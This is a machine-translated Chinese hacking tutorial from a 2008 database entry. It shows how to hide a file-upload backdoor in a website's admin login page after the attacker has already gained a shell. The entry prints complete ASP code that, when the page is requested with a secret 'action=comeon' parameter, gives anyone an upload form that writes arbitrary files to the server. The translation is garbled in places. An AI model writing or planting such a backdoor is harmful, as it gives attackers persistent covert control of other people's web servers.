The admin back-end to hide the ASP Backdoor-vulnerability warning-the black bar safety net

2008-02-16T00:00:00
ID MYHACK58:62200818373
Type myhack58
Reporter 佚名
Modified 2008-02-16T00:00:00

Description

Today that is in the administrator backend login screen hidden our back door, which is relatively safe, because the administrator of the inlet is not

Often change, as long as his login screen on our back door just in!

  1. From our SHELL found on the administrator portal page

  2. Edit it in the final write on a piece of code

<%if request. QueryString("action")="comeon" then a=Request. TotalBytes:if a Then b="adodb. stream":Set c=Createobject(b):c. Type=1:c. Open:c. The Write Request. BinaryRead(a):c. Position=0:d=c. Read:e=chrB(1 3)&chrB(1 0):f=Instrb(d,e):g=Instrb(f+1,d,e):set h=Createobject(b):h. Type=1:h. Open:c. Position=f+1:c. Copyto h,g-f-3:h. Position=0:h. type=2:h. CharSet="BIG5":i=h. Readtext:h. close:j=mid(i,InstrRev(i,"\")+1,g):k=Instrb(d,e&e)+4:l=Instrb(k+1,d,leftB(d,f-1))-k-2:h. Type=1:h. Open:c. Position=k-1:c. CopyTo h,l:h.SaveToFile server. mappath(j),2%><form enctype=multipart/form-data method=post><input type=file name=n><input type=submit></form> <%end if%>

  1. So how are we gonna go find us a back door? The surface is nothing to distinguish this is what we hide the secret of where the

login. asp+? action=comeon Appears our upload page!